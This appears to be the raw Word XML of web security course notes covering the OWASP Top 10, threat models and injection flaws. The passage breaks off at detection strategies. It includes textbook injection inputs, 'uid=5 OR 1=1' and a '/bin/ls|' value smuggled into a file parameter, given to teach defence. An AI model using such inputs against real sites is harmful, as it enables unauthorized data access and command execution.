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FDD0" w14:textId="1C4C1A85" w:rsidR="00FA5850" w:rsidRDefault="00496876" w:rsidP="0028203C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Day_4_MT_Web Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B10744" w14:textId="1BF88F18" w:rsidR="0028203C" w:rsidRPr="00AD0481" w:rsidRDefault="00496876" w:rsidP="002820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Web</w:t>
      </w:r>
      <w:r w:rsidR="00B112CE" w:rsidRPr="00B112CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0028203C" w:rsidRPr="00AD0481">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Day </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="0028203C" w:rsidRPr="00AD0481">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3286B1EE" w14:textId="18B21617" w:rsidR="00496876" w:rsidRPr="00496876" w:rsidRDefault="00496876" w:rsidP="0049687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96876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Web Application Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7142548A" w14:textId="77777777" w:rsidR="00496876" w:rsidRPr="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7464D438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Simplified Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAFDD25" w14:textId="08C93842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Client: Web browser (Chrome, Firefox, Safari, Edge)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC062D8" w14:textId="2A7FF6F2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Server: Web server + application logic + database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029CC6EC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Communication: HTTP/HTTPS protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53880607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245C2086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Server Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484C6267" w14:textId="0A3179E2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Static Content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F469879" w14:textId="271D9005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HTML files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A71B98" w14:textId="342ADD25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Images, figures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE1177A" w14:textId="6B72994C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Audio/video files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7CCD84" w14:textId="266FF60B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 xml:space="preserve">CSS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>stylesheets</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="26A8D3D2" w14:textId="303EBA2C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Dynamic Content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F7CED8" w14:textId="7178E9F8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CGI (Common Gateway Interface)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32399C70" w14:textId="46B4D3F1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Server-Side Includes (SSI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333C268A" w14:textId="2233A05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XSLT (Extensible Stylesheet Language Transformations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B397411" w14:textId="319AF0A4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Server-side scripting: PHP, ASP, JSP, CFML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A2670D" w14:textId="200E7E8D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Compiled frameworks: Java servlets, ASP.NET, ColdFusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D77FF90" w14:textId="671998D3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Frameworks: Hibernate, Struts, Spring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D1D326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6F9409BB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lastRenderedPageBreak/>
        <w:t>Web Application Complexity Factors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9DDC65" w14:textId="6D9E4406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Agglomeration of Technologies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099020E7" w14:textId="6BA4979B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Communication protocols (HTTP, HTTPS, TCP, FTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A15ED22" w14:textId="24591836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Programming/markup languages (HTML, XML, JavaScript, PHP, SQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475C37FE" w14:textId="09028FAF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Interfaces (ISAPI, NSAPI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9C233A" w14:textId="424EEBAA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Services/frameworks (SSIS, ASP.NET, cookies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4260DA81" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E7F098" w14:textId="18AB6F8A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State Management Challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0F28A7" w14:textId="03E2D176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Basic web apps are stateless (HTTP is stateless)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F770A8E" w14:textId="2F8A448E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Most applications need to maintain state (user sessions, shopping carts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DCAC59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State tracking introduces vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CCA61B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6C0B305B" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CEFDCF4" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7191B53E" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A48901E" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1262F64F" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2348FB50" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A4797D" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A5AF7F9" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC27AEC" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B28938F" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0250554C" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="160D1022" w14:textId="4714C181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lastRenderedPageBreak/>
        <w:t>2. Motivation for Web Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E30B648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OWASP Top 10 Evolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCD9808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OWASP Top 10 2017</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D47E79" w14:textId="6674C743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A01: Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2272FE08" w14:textId="290D40B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A02: Broken Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7354FAAF" w14:textId="7C786B1E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A03: Sensitive Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3EEDA6" w14:textId="32B25868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A04: XML External Entities (XXE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE4A7C0" w14:textId="7EF66704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A05: Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AB4939" w14:textId="4DDB1178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A06: Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787FA448" w14:textId="6839FCBC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A07: Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C85BDEF" w14:textId="5EE4F982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A08: Insecure Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6947162E" w14:textId="13A1B7D4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A09: Using Components with Known Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672AC085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A10: Insufficient Logging &amp; Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E28980A" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14678FEB" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44980F78" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567CF1FB" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70831B4C" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="543819BF" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52FED458" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B7DF9A0" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F931B84" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D34B5A0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265D9CCA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lastRenderedPageBreak/>
        <w:t>OWASP Top 10 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B874F1B" w14:textId="1144D336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A01: Broken Access Control (moved up from #5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5D2A6C" w14:textId="18678713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A02: Cryptographic Failures (formerly Sensitive Data Exposure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEE747F" w14:textId="56B5B02E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A03: Injection (remains in top 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480A9C06" w14:textId="1334AB1B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A04: Insecure Design (new category)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41270358" w14:textId="6694EED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A05: Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A14D6F" w14:textId="7A9BAB9B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A06: Vulnerable and Outdated Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C77672" w14:textId="4113630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A07: Identification and Authentication Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C56CD1" w14:textId="43CCD396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A08: Software and Data Integrity Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01230EC7" w14:textId="1FCAD7FD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A09: Security Logging and Monitoring Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FA95DA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A10: Server-Side Request Forgery (SSRF) (from community survey)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00539BF5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2292C35F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Security Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740BA566" w14:textId="2A288BE6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Protect Users From:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775F90C6" w14:textId="708BC90C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Social engineering attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AC4A89" w14:textId="3DACD10A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Tracking and privacy violations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A4A21D" w14:textId="29DC33E4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Malware and ransomware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEC385C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Data leakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703AE4C8" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C8087FD" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32FEEEFA" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="420A42A9" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AAC9A06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0B1D346F" w14:textId="7FBF81B3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lastRenderedPageBreak/>
        <w:t>Protect Services From:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6583D67A" w14:textId="70DFA1FE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Data breaches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7E620F" w14:textId="4E5671C0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Intellectual property theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B06D6BA" w14:textId="5A9DB9A9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Service disruption attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40685EFC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Financial loss and reputational damage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F10B2F9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3EAEFAF6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3. Web Security and Threat Models</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DE769F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Three Security Perspectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442ED39A" w14:textId="6FE86E4B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Browser Security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55860275" w14:textId="42DC34A6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Isolate sites from each other (same-origin policy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A78581F" w14:textId="14DC9275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Prevent cross-site data leakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D944D3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Sandbox execution environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3228E5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55E0A70D" w14:textId="6CEB5749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Server-Side Security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C8F1DB" w14:textId="1B8081FC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Protect against direct attacks from clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2971B923" w14:textId="2C075AC5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Secure authentication and authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD84970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Prevent data injection and manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2685F95F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67A27438" w14:textId="3131F03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Client-Side Security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771E897B" w14:textId="63D92DBE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Protect users from malicious dynamic content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658B858F" w14:textId="1DBCC1F8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Prevent client-side attacks (XSS, clickjacking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348FB317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Secure user data in the browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D641AA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41A1D519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lastRenderedPageBreak/>
        <w:t>General Threat Models</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D09C21" w14:textId="6D6A08CE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Malicious Server in Mashup Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146849EE" w14:textId="17E0AC24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Multiple servers combine content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2775FEE9" w14:textId="2138AABC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One malicious server can compromise entire application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C0E8EA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Example: Malicious advertising server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B442A9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1CD0B4ED" w14:textId="15FAB6FB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Malicious User in Multi-Server Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B14420" w14:textId="4E4A7600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Attacker interacts with multiple legitimate servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6035D7" w14:textId="199DCE65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Exploits trust relationships between servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4600F7D8" w14:textId="38FE574B" w:rsidR="00466569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Example: Cross-site request forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30357810" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50FE1B3D" w14:textId="0CBC55D5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4. Injection Flaws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F67C3EF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Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1465751B" w14:textId="0E4BD3AF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"Injection flaws occur when an application sends untrusted data to an interpreter." — OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134A5412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Core Problem: Mixing data and code without proper separation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2587E00D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68AB1E53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Types of Injection Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4E42B7" w14:textId="0E049A33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SQL Injection (most prevalent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A1C826" w14:textId="619C3DCA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OS Command Injection (shell injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0628C4F7" w14:textId="41FB4F1E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LDAP Injection (Lightweight Directory Access Protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0868BD67" w14:textId="6116F87B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XPath Injection (XML query language)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3536D4A9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XSLT Injection (Extensible Stylesheet Language Transformations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138932BC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116C19E3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SQL Injection Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689720C5" w14:textId="7B29C6CB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Database Schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D86F04F" w14:textId="1D89DE13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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D194183" wp14:editId="5CF32AC9">
            <wp:extent cx="5087060" cy="1600423"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="100625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2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E795" w14:textId="62E81B37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Normal Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC7A850" w14:textId="64F65037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 xml:space="preserve">SELECT * FROM users WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>=5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0849EF" w14:textId="24C0EF8F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Result: Returns only John's data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6720D67F" w14:textId="48093848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Injected Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FE013E" w14:textId="49CD61AD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 xml:space="preserve">SELECT * FROM users WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>=5 OR 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D71E646" w14:textId="4FE1B3CC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Result: Returns ALL rows (including admin credentials)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581F0097" w14:textId="20BB7A25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OR 1=1 is always TRUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386694D8" w14:textId="77777777" w:rsidR="00496876" w:rsidRPr="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Attacker</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>gains</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> access to all user data, including passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52690333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21ACA87A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OS Command Injection Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C346077" w14:textId="77C807D7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Perl Code Vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4993EA2C" w14:textId="4786400D" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>open(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FILE, "/bin/ls|</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>")  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Executes command instead of opening file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1608FFC1" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589153A4" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46AF2545" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25443773" w14:textId="5A429085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lastRenderedPageBreak/>
        <w:t>Attack Vector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E4F6E8" w14:textId="6D03D81A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Normal request: http://site.com/userData.pl?doc=user1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE2803C" w14:textId="48359192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Malicious request: http://site.com/userData.pl?doc=/bin/ls|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4F0A0B" w14:textId="325E540A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Result: Executes ls command on server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F99A67D" w14:textId="77777777" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76427332" w14:textId="46694570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Protection Against Injection Flaws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4A48F6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Detection Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B42461" w14:textId="5494EA3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Code Analysis:</w:t>
